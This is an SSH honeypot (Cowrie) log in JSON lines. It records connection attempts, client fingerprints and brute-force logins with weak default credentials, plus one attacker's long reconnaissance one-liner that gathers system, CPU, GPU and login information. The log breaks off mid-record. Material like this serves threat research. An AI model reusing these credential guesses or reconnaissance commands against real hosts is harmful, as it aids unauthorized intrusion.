sa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:49:03.600010Z","src_ip":"212.227.235.229","session":"32bddd5df926"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:49:03.609587Z","src_ip":"212.227.235.229","session":"32bddd5df926"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T12:49:03.827835Z","src_ip":"139.59.14.27","session":"8ad08762911d"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:49:05.152544Z","src_ip":"139.59.14.27","session":"8ad08762911d"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":54218,"dst_ip":"1.2.3.4","dst_port":22,"session":"c54d050de784","protocol":"ssh","message":"New connection: 139.59.14.27:54218 (1.2.3.4:22) [session: c54d050de784]","sensor":"my-vps","timestamp":"2025-09-08T12:49:05.500673Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:49:05.501323Z","src_ip":"139.59.14.27","session":"c54d050de784"}
{"eventid":"cowrie.session.closed","duration":12.90878438949585,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:49:05.569268Z","src_ip":"212.227.235.229","session":"f43a8d3b4a0b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:49:05.841301Z","src_ip":"139.59.14.27","session":"c54d050de784"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:49:07.232502Z","src_ip":"139.59.14.27","session":"c54d050de784"}
{"eventid":"cowrie.session.closed","duration":"9.7","message":"Connection lost after 9.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:49:07.550518Z","src_ip":"139.59.14.27","session":"37a6e4a538bc"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:49:07.575855Z","src_ip":"139.59.14.27","session":"c54d050de784"}
{"eventid":"cowrie.session.connect","src_ip":"113.113.80.36","src_port":38962,"dst_ip":"1.2.3.4","dst_port":22,"session":"5fb710a3da18","protocol":"ssh","message":"New connection: 113.113.80.36:38962 (1.2.3.4:22) [session: 5fb710a3da18]","sensor":"my-vps","timestamp":"2025-09-08T12:49:19.517918Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:49:19.522259Z","src_ip":"113.113.80.36","session":"5fb710a3da18"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:49:19.744371Z","src_ip":"113.113.80.36","session":"5fb710a3da18"}
{"eventid":"cowrie.login.failed","username":"gaoyuan","password":"gaoyuan123","message":"login attempt [gaoyuan/gaoyuan123] failed","sensor":"my-vps","timestamp":"2025-09-08T12:49:20.648229Z","src_ip":"113.113.80.36","session":"5fb710a3da18"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38424,"dst_ip":"1.2.3.4","dst_port":22,"session":"c37b6815f7a4","protocol":"ssh","message":"New connection: 212.227.235.229:38424 (1.2.3.4:22) [session: c37b6815f7a4]","sensor":"my-vps","timestamp":"2025-09-08T12:49:21.452775Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:49:21.453488Z","src_ip":"212.227.235.229","session":"c37b6815f7a4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:49:21.618569Z","src_ip":"212.227.235.229","session":"c37b6815f7a4"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:49:21.879512Z","src_ip":"113.113.80.36","session":"5fb710a3da18"}
{"eventid":"cowrie.login.failed","username":"appuser","password":"password1","message":"login attempt [appuser/password1] failed","sensor":"my-vps","timestamp":"2025-09-08T12:49:22.317592Z","src_ip":"212.227.235.229","session":"c37b6815f7a4"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:49:23.485210Z","src_ip":"212.227.235.229","session":"c37b6815f7a4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44978,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca2a1baef28d","protocol":"ssh","message":"New connection: 212.227.235.229:44978 (1.2.3.4:22) [session: ca2a1baef28d]","sensor":"my-vps","timestamp":"2025-09-08T12:49:26.246387Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:49:26.247226Z","src_ip":"212.227.235.229","session":"ca2a1baef28d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:49:26.379709Z","src_ip":"212.227.235.229","session":"ca2a1baef28d"}
{"eventid":"cowrie.login.failed","username":"appuser","password":"password1","message":"login attempt [appuser/password1] failed","sensor":"my-vps","timestamp":"2025-09-08T12:49:26.946032Z","src_ip":"212.227.235.229","session":"ca2a1baef28d"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:49:28.081944Z","src_ip":"212.227.235.229","session":"ca2a1baef28d"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":49522,"dst_ip":"1.2.3.4","dst_port":22,"session":"8dc499fdbe6f","protocol":"ssh","message":"New connection: 134.199.174.250:49522 (1.2.3.4:22) [session: 8dc499fdbe6f]","sensor":"my-vps","timestamp":"2025-09-08T12:49:29.881540Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T12:49:29.885312Z","src_ip":"134.199.174.250","session":"8dc499fdbe6f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T12:49:30.190529Z","src_ip":"134.199.174.250","session":"8dc499fdbe6f"}
{"eventid":"cowrie.login.success","username":"root","password":"password1","message":"login attempt [root/password1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:49:31.330540Z","src_ip":"134.199.174.250","session":"8dc499fdbe6f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:49:31.961139Z","src_ip":"134.199.174.250","session":"8dc499fdbe6f"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T12:49:31.962007Z","src_ip":"134.199.174.250","session":"8dc499fdbe6f"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T12:49:31.962686Z","src_ip":"134.199.174.250","session":"8dc499fdbe6f"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T12:49:31.964336Z","src_ip":"134.199.174.250","session":"8dc499fdbe6f"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T12:49:31.965639Z","src_ip":"134.199.174.250","session":"8dc499fdbe6f"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T12:49:31.966215Z","src_ip":"134.199.174.250","session":"8dc499fdbe6f"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T12:49:31.967249Z","src_ip":"134.199.174.250","session":"8dc499fdbe6f"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T12:49:31.968748Z","src_ip":"134.199.174.250","session":"8dc499fdbe6f"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T12:49:31.969161Z","src_ip":"134.199.174.250","session":"8dc499fdbe6f"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T12:49:31.969777Z","src_ip":"134.199.174.250","session":"8dc499fdbe6f"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T12:49:31.970257Z","src_ip":"134.199.174.250","session":"8dc499fdbe6f"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T12:49:31.971080Z","src_ip":"134.199.174.250","session":"8dc499fdbe6f"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T12:49:31.971805Z","src_ip":"134.199.174.250","session":"8dc499fdbe6f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T12:49:32.298918Z","src_ip":"134.199.174.250","session":"8dc499fdbe6f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:49:32.299878Z","src_ip":"134.199.174.250","session":"8dc499fdbe6f"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:49:32.300712Z","src_ip":"134.199.174.250","session":"8dc499fdbe6f"}
{"eventid":"cowrie.login.failed","username":"pi","password":"raspberry","message":"login attempt [pi/raspberry] failed","sensor":"my-vps","timestamp":"2025-09-08T12:49:36.543262Z","src_ip":"45.78.196.182","session":"cefb7b3e371f"}
{"eventid":"cowrie.session.closed","duration":"34.0","message":"Connection lost after 34.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:49:36.544130Z","src_ip":"45.78.196.182","session":"cefb7b3e371f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57796,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e3c054259ae","protocol":"ssh","message":"New connection: 212.227.235.229:57796 (1.2.3.4:22) [session: 0e3c054259ae]","sensor":"my-vps","timestamp":"2025-09-08T12:49:46.566324Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:49:46.569316Z","src_ip":"212.227.235.229","session":"0e3c054259ae"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:49:46.863267Z","src_ip":"212.227.235.229","session":"0e3c054259ae"}
{"eventid":"cowrie.login.failed","username":"test1","password":"test1.123","message":"login attempt [test1/test1.123] failed","sensor":"my-vps","timestamp":"2025-09-08T12:49:48.045786Z","src_ip":"212.227.235.229","session":"0e3c054259ae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51204,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f8732c5e67a","protocol":"ssh","message":"New connection: 212.227.235.229:51204 (1.2.3.4:22) [session: 9f8732c5e67a]","sensor":"my-vps","timestamp":"2025-09-08T12:49:48.153756Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:49:48.154452Z","src_ip":"212.227.235.229","session":"9f8732c5e67a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-2